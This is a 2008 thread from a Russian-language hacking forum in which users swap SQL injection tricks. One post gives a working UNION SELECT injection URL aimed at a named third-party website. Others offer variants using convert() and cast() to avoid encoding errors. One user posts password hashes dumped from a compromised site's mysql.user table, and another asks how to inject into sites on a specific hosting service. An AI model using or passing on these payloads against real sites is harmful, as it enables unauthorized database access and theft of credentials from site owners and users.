ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.02.2008, 20:21
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 CaNNabi$
нужно обойти фильтрацию держи:
_http://www.petrovacnamoru.net/petrovac/kafe-barovi/?id=0x3127%20union+select+1,aes_decrypt(aes_encryp t(version(),0x71),0x71),3,4/*
|
|
|
21.02.2008, 21:35
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
jokester, лол, это по твойму филтьрация?
Что за люди, если не знаешь нахуя писать всякую еботу?
|
|
|
|
21.02.2008, 22:17
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 Spyder
Извиняюсь за неточность обход ошибок кодировки
Функции AES_ENCRYPT() и AES_DECRYPT()- позволяют шифровать/дешифровать данные
Сначала шифруем с заданным ключом потом расшифровываем.Результат выводится уже в правильной кодировке. так лучше?
|
|
|
|
22.02.2008, 02:34
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744
Репутация:
16
|
|
нашел один сай sql... из mysql.user version() - 4.1.20
достал логины и шеши
bla:*7E031FB695D422377447A5660A3B95FED283B260
bla:*7CDBD368F59FA498366CBEC09B7A5C2BAF06D045
потом пошли
bla:3bb4472d333b8afa
......
потом снова такого вида
bla:*7E031FB695D422355967A5660A3B95FED283B260
что это все значит
|
|
|
|
22.02.2008, 02:39
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
jokester нет. нахрена шифровать/дешифровать, если можно юзать нужную кодировку convert(version()+using+latin1)
|
|
|
|
22.02.2008, 02:54
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
вообще можно представить вывод функции в бинарном виде с помощьюфункции cast()
так намного проще
cast(version()+as+binary)
|
|
|
|
22.02.2008, 03:02
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
У меня такой вопрос,возможно ли провести sql инъекцию в сайтах бла.jino-net.ru, или нет? Спрашиваю потому что нираз не удавалось,в чем там загвоздка?
Последний раз редактировалось fobofob; 22.02.2008 в 03:06..
|
|
|
|
22.02.2008, 03:06
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
да, конечно возможно
|
|
|
|
22.02.2008, 03:10
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Сообщение от o3,14um
да, конечно возможно
есть рабочий пример? Дай глянуть
|
|
|
|
22.02.2008, 03:25
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Сообщение от fobofob
есть рабочий пример? Дай глянуть
там все обычно. на каждом сайте выделяется одна бд под нужды юзера. соответственно, если на сайте есть уязвимые скрипты, можно провести инъекцию в эту бд.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
